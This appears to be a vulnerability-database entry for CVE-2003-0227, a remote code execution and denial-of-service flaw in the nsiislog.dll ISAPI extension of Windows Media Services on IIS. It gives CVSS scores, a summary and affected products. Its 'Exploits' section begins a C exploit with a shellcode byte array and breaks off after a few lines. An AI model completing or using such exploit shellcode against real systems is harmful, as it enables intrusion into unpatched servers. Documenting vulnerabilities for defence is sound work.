5
CVSSv2

CVE-2003-0227

Published: 09/06/2003 Updated: 13/11/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote malicious users to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows 2000 -

microsoft windows nt 4.0

Exploits

#include <stdioh> #include <winsock2h> #include <stdlibh> #include <errnoh> #include <stringh> char *hostName = NULL; unsigned char shellcode[]= "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90" "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa" "\x ...